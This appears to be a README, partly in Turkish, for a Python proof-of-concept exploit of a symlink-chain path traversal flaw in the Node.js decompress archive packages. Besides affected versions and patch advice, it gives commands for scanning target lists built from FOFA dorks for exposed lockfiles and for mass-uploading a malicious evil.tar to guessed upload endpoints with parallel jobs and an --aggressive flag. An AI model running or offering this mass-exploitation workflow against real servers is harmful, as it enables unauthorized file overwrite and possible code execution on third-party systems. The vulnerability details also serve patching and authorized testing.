Python 3 PoC for **[CVE-2026-101894]( — **Node.js** archive extraction in **`@xhmikosr/decompress`** (and unmaintained **`decompress`**) allows **read/write outside the output directory** via a **chain of symlink entries**. Bypass of **[CVE-2026-53486]( hardening. **CVSS 3.1 9.1 Critical**.
| **PoCbit** | |
| **Catalog** | |
| **Package** | `@xhmikosr/decompress` (maintained), `decompress` (kevva, **unpatched**) |
| **API** | Default `decompress(input, output)` |
| **CWE** | CWE-22 path traversal, CWE-59 link following |
| **Fixed** | **10.2.2** (10.x), **11.1.4** (11.x) |
| **GHSA** | [GHSA-hrh2-vp3x-79xf]( |
`decompress`, tar/zip vb. arşivleri hedef klasöre açarken lexical path kontrolleri uygular; ancak **ardışık symlink girdileri** ile kernel, sonraki girdileri **çıktı dizini dışında** çözebilir. Saldırgan kontrollü arşivle **config**, **startup script** veya hassas dosyaların **üzerine yazabilir** / okuyabilir → **RCE** senaryosu (CI, container, upload+extract servisleri).
**@xhmikosr/decompress** için yama: **10.2.2** ve **11.1.4**. Eski **`decompress`** paketi **4.2.1**’e kadar aynı sınıfta ve **yama almıyor** — `@xhmikosr/[email protected]+`’e geçin.
| **`--lab`** | `lab/` içinde **11.1.3** kurar, `evil.tar` symlink zinciri ile **dışarı yazmayı** doğrular |
| **`--write-evil-tar`** | Payload arşivini diske yazar (`POCBIT-101894-ESCAPED` marker) |
| **`check`** | Uzak hedefte `package.json` / lockfile → sürüm **≤ riskli** mi? |
| **`exploit`** | Symlink-chain **evil.tar** ile yaygın **upload** yollarına POST (mass bulk) |
| **mass** | `--list` + `-j`; `hits.txt` / **`exploited.txt`** |
Uzak exploit, sunucunun arşivi gerçekten **decompress ile açtığını** kanıtlamaz; **2xx upload kabulü** + zayıf sürüm fingerprint’i `exploited` sayılır. Kesin kanıt için **`--lab`**.
### `hits.txt` vs `exploited.txt` (sık görülen durum)
| **check → hits.txt** | `/package.json` veya `/package-lock.json` **açık** ve içinde **zayıf `decompress`** var |
| **exploit → exploited.txt** | PoC’nin denediği **genel upload URL’lerinden** en az biri **HTTP 2xx** döndü |
FOFA Express listesinde **500 scan → 2 hit** normaldir. **2 hit + 0 exploit** (`vulnerable_dep_no_upload_endpoint`) da normaldir: bağımlılık sızıntısı ≠ herkese açık arşiv upload. Bu CVE **istismar** için uygulamanın untrusted arşivi **`decompress()` ile açması** gerekir; HID / rastgele :8088 sitelerinde PoC’nin 8–11 varsayılan path’i çoğu zaman yoktur.
# Hit’ler: sadece bağımlılık + upload denemesi
python poc.py --list hits.txt --mode exploit -j 2
# Beklenen: upload_ok=0, status vulnerable_dep_no_upload_endpoint
| `@xhmikosr/decompress` **11.x** | 11.0.0 – **11.1.3** | **≥ 11.1.4** |
| `@xhmikosr/decompress` **10.x** | < **10.2.2** | **≥ 10.2.2** |
| `decompress` (kevva) | **≤ 4.2.1** | *none — migrate* |
**Lab:** Node.js + npm on PATH (Linux/macOS recommended for symlink extract behavior).
python poc.py -u --mode check
python poc.py --list targets.example.txt --mode check -j 30 --vuln-list hits.txt
python poc.py -u --mode exploit --aggressive
python poc.py --list hits.txt --mode exploit -j 10 --aggressive --upload-paths /api/upload,/upload
| `--aggressive` | Exploit even without exposed vulnerable lockfile |
| `--upload-paths` | Custom comma-separated POST paths |
| `--exploited-list` | Targets where upload returned 2xx |
4. Regular files `…/pocbit_escape.txt` with marker payload
Matches the **symlink-chain bypass** class described in **11.1.4** release notes (realpath / containment fix).
FOFA JSON → python _format_fofa.py fofa_results_1000.json
→ fofa_results_1000.json (url), fofa_results_1000.csv, fofa_targets_1000.txt
python poc.py --list fofa_targets_1000.txt --mode check -j 40 → hits.txt
python poc.py --list fofa_results_1000.csv --mode check -j 40 # url column
python poc.py --list hits.txt --mode exploit -j 8 --aggressive → exploited.txt
Upload/zip FOFA dork listesi (`fofa_results_1000`) exploit yüzeyi için Express-only 500 listesinden daha uygundur; yine de **hit = lockfile + zayıf decompress**, exploit = upload 2xx.
body="\"decompress\"" && body="package-lock.json"
header="X-Powered-By: Express" && body="/package.json"
*(Lockfile rarely public in prod; check often finds staging, CI artifacts, misconfigured static hosting.)*
- [PoCbit CVE-2026-101894](
- [CVE.report](
- [v11.1.4 release](
- Prior: **CVE-2026-53486** / GHSA-mp2f-45pm-3cg9
Test only systems you are authorized to assess. Do not upload malicious archives to third-party production services.
CVE-2026-101894 PoC: @xhmikosr/decompress symlink-chain archive path traversal (bypass CVE-2026-53486). Node lab + lockfile scan + mass evil.tar upload exploit. CVSS 9.1.
The full story
This article is one source in a clustered incident — the cluster page carries the summary, timeline and every other outlet covering it.
